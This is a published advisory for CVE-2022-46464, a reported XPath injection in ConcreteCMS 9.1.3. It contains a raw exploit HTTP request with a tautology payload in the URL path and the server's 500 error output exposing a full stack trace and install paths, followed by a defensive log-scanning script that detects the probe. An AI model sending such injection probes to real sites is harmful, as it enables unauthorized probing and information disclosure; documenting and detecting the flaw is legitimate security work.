CVE-2022-46464: CVE-nu11secur1ty/vendors/concretecms.org/2022/concretecms-9.1.3 at main · nu11secur1ty/CVE-nu11secur1ty

ConcreteCMS v9.1.3 was discovered to be vulnerable to Xpath injection attacks. This vulnerability allows attackers to access sensitive XML data via a crafted payload injected into the URL path folder "3".


concretecms-9.1.3 - XPath injection - File Path traversal

Description:

The URL path folder 3 appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in the URL path folder 3, and an XPath error message was returned. By using this vulnerability, an attacker can flood the system with requests until they receive the actual paths of all content of this system, which is stored on some internal or external server.

STATUS: HIGH Vulnerability

[+] Exploit:

GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

[+] Response:

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153

<!DOCTYPE html><!--

Whoops\Exception\ErrorException: include(): Failed opening 'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php' for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR') in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php on line 26
Stack trace:

  1. Whoops\Exception\ErrorException->() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
  2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
  3. Stash\Driver\FileSystem\NativeEncoder->deserialize() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
  4. Stash\Driver\FileSystem->getData() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
  5. Stash\Item->getRecord() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
  6. Stash\Item->executeGet() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
  7. Stash\Item->get() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
  8. Stash\Item->isMiss() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
  9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
  10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
  11. Laminas\I18n\Translator\Translator->loadMessages() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
  12. Laminas\I18n\Translator\Translator->getTranslatedMessage() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
  13. Laminas\I18n\Translator\Translator->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
  14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
  15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
  16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
  17. Concrete\Core\Block\View\BlockView->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
  18. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
  19. Concrete\Core\Area\Area->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
  20. Concrete\Core\Area\GlobalArea->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
  21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
  22. Concrete\Core\View\View->inc() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
  23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
  24. Concrete\Core\View\View->renderTemplate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
  25. Concrete\Core\View\View->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
  26. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
  27. Concrete\Controller\SinglePage\PageNotFound->view() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
  28. call_user_func_array() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
  29. Concrete\Core\Controller\AbstractController->runAction() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
  30. Concrete\Core\Http\ResponseFactory->controller() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
  31. Concrete\Core\Http\ResponseFactory->notFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
  32. Concrete\Core\Http\ResponseFactory->collectionNotFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
  33. Concrete\Core\Http\ResponseFactory->collection() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
  34. Concrete\Core\Http\DefaultDispatcher->handleDispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
  35. Concrete\Core\Http\DefaultDispatcher->dispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
  36. Concrete\Core\Http\Middleware\DispatcherDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
  37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
  38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
  39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
  40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
  41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
  42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
  43. Concrete\Core\Http\Middleware\CookieMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
  44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
  45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
  46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
  47. Concrete\Core\Http\Middleware\MiddlewareStack->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
  48. Concrete\Core\Http\DefaultServer->handleRequest() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
  49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
  50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
  51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2

--><html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>Concrete CMS has encountered an issue.</title>

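A defender-side check for the probe shown above, as an added example that is not part of the original advisory: it scans Apache combined-format access-log lines for a quote followed by a boolean tautology in the URL path and records whether a 5xx error page was served in reply. The log lines are constructed, and the function and field names are illustrative assumptions.

```python
import re
from urllib.parse import unquote

# Apache "combined" log: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A quote followed by a comparison of two identical operands: ' or 4591=4591
TAUTOLOGY_RE = re.compile(r"""['"]\s*(?:or|and)\s+(\w+)\s*=\s*\1\b""", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2527) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_path_injection_probes(lines):
    """Return one finding per log line whose URL path carries a tautology."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = fully_decode(m["target"].split("?", 1)[0])
        hit = TAUTOLOGY_RE.search(path)
        if hit:
            status = int(m["status"])
            findings.append({
                "ip": m["ip"],
                "status": status,
                "matched": hit.group(0),
                # 5xx means an error page was served; with debug output
                # enabled that page can carry a stack trace and local paths.
                "error_page_served": status >= 500,
            })
    return findings


# Constructed sample lines (not real traffic); the second mirrors the request above.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Nov/2022:15:32:20 +0000] "GET /concrete-cms-9.1.3/index.php/blog/rock%20and%20roll HTTP/1.1" 200 5120',
    "203.0.113.7 - - [28/Nov/2022:15:32:22 +0000] \"GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1\" 500 592153",
    '203.0.113.7 - - [28/Nov/2022:15:32:25 +0000] "GET /concrete-cms-9.1.3/index.php/x%2527%2520or%25201%253d1/assets HTTP/1.1" 404 1043',
]

if __name__ == "__main__":
    for finding in find_path_injection_probes(SAMPLE_LOG):
        print(finding)
```

Findings with `error_page_served` set are the ones to triage first, since the response above shows that a 500 page can expose the full installation path.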

Time spent

03:00:00

Related news

GHSA-7vx2-5349-qj99: ConcreteCMS vulnerable to Xpath injection attacks
